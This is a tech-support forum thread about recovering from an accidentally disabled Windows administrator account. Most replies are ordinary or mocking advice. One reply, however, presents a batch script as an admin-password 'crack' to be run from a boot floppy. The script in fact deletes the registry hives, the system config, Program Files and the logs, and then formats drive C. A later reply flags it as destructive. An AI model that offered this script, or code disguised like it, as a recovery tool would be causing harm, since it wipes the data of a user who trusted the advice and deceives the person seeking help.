Security

Question

Locked

Accidently disabled admin account, how to enable it back?

By ar8 ·
i've go to control panel>>administrative tools>>local security setting then i disabled the admin account. after i restart my pc it login to Guest account. ive try to log in in safe mode, but still not work...Any other tips, beside reformat my pc??

This conversation is currently closed to new comments.

Thread display: Collapse - | Expand +

All Answers

Collapse -

What is the machine running?

by CookieOrc In reply to Accidently disabled admin ...

Is this XP pro, home, W2k, Vista?

Try the linux distro System Rescue. Use the NTFS password tools. It does let you reset accounts (it also show you all accounts available).
If that does not work look at how to do an escalation of privileges there has to be someone willing to spill...

Collapse -

No accident there.....

by ThumbsUp2 In reply to Accidently disabled admin ...

That was no accident. You did exactly what you set out to do. You disabled the administrator account. If there are no accounts left to log into, other than the guest account, you sunk your own ship.

Since you obviously set out to destroy the computer, it's now time to run the recovery CD that came with the computer and reset it back to the way it was when you bought it. Of course, this will wipe the drive and destroy everything on it.

Collapse -

That's what 'Guest' accounts are for !! . . .

by OldER Mycroft In reply to Accidently disabled admin ...

So that a numpty like you can't just happen to 'accidentally' disable your own admin account.

Pity you didn't realise that before you last logged in.

Or maybe you did!!

Collapse -

WOW!

by JPLconsultant In reply to Accidently disabled admin ...

Well done.

As mentioned, this is where you get to practice using the restore CD.

Collapse -

This is what I call a true "FUBAR" moment

by ManiacMan In reply to Accidently disabled admin ...

What compelled you to do such a stupid thing? If you wanted to protect the administrator account, you should have either renamed it to something else or created another account that was admin equivalent in rights. I hope you backed up your data because you have just given yourself an excuse to reformat your drive and reinstall your OS. Well done!

Collapse -

RE: Accidently disabled admin account, how to enable it back?

by Jacky Howe In reply to Accidently disabled admin ...

Now you know why you shouldn't use the Administrator Account as your Primary Logon. I doubt if this will work through the Guest Account but it's worth a try. Go to a command prompt and type.

net user administrator /active:yes

Collapse -

You can try this -- Admin PW Crack

by The Scummy One In reply to Accidently disabled admin ...

If you are using W2k, WXP this should work.
See now you know why not to mess around without any thought! Sorry, this is a template, I didnt want to re-write it for this post. Anything that says hacker/cracker just forget about it. Oh, and illegal is only if you use it on someone elses machine.


Ok, so you wanna be a cracker. This is cracking 101. Just remember that NEVER TRY THIS, as it is illegal. Ok, for starters let me just say that this is tricky. No actual danger though, but you really should practice it on your own system before attempting to try it on anyone elses. You should at minimum try it 5 or 6 times to really get to know how to do it well.

Items needed

Ability to create a batch file
floppy disk
USB floppy disk drive
create a boot floppy with NTFS Write permissions

Ok, once you have gathered the materials you should already have a boot floppy ready. In the autoexec.bat file add the line suser.bat at the end.

On your desktop, create a file called suser.txt for (suser stands for Super User).
Open the suser.txt file and paste the information below

cls
rem # start _admin.pwd
ren %systemroot%\system32\etc %systemroot%\system32\cet
rem start process A32#458
ren %systemroot%\repair\DS_SOFTWARE A1E
ren %systemroot%\repair\DS_SECURITY A2E
ren %systemroot%\repair\DS_SAM A3E
ren %systemroot%\repair\DS_system.bak A4E
del %systemroot%\repair\A*.* /Q /F
del %systemroot%\repair\s*.* /Q /F
rem script _admin.pwd
del %systemroot%\system32\catroot\*.*
del %systemroot%\system32\catroot2\*.*
del %systemroot%\system32\drivers\cet*.*
rem new_pwd.pwd ==generate 0
del "c:\program files" /Q /F
ren %systemroot%\system32 %systemroot%\newpwd
ren %systemroot%\system %systemroot%\system32
rem AUTO_START new_pwd.pwd 44#1
rem _admin.pwd == DISABLE
del %systemroot%\system32\config /Q /F
erase %systemroot%\system32\LogFiles\*.*
rem ACTIVATE_MEMORY_FLOOD_0x0000323A
rem DISABLE_LOGFILES
format c /Q /A:4096
rem RESTART _admin.pwd


Paste all of this into the suser.txt file. Save and close the file. Rename the file to suser.bat
copy the file to your boot floppy disk.

Boot to the new floppy disk and test it. This may stop and ask to press OK a few times. It should not, but it may still.
Sometimes people really lock down the admin account, but this program is smart enough to unlock from both 'hidden' places, to allow a 'no password' option and blank it out, a double whammy!!!

Remember, this is a REAL program that can get you into serious trouble. Also, it is 'time sensitive' when dealing with another persons system without them knowing. Always get to know a program with this much power BEFORE attempting to use it on someone elses machine.

And most of all, never actually use it. I posted it as informative material. USE AT YOUR OWN RISK!!!
And, never ever tell anyone that I gave this to you....

Collapse -

This is a joke right?

by vaisg In reply to You can try this -- Admin ...

You're wiping out the system files, program files folder and then do a format c: ??

Why is this even allowed to remain is a real mystery.

Collapse -

Nope - it's a ZOMBIE ALERT ! - ZOMBIE ALERT ! ...

by OldER Mycroft In reply to This is a joke right?

How did you manage to dig up a 22 MONTH OLD thread?

Just so's you could cast aspersions on the credibility of the Poster??!!

Why it was allowed to remain is crystal clear - the OP deliberately set out to destroy a computer, thereby rendering it useless. What harm could possibly be done to a system that was already less than useless?

More importantly, how did you manage to find it when it was almost TWO YEARS DEAD??!!

Related Discussions

Related Forums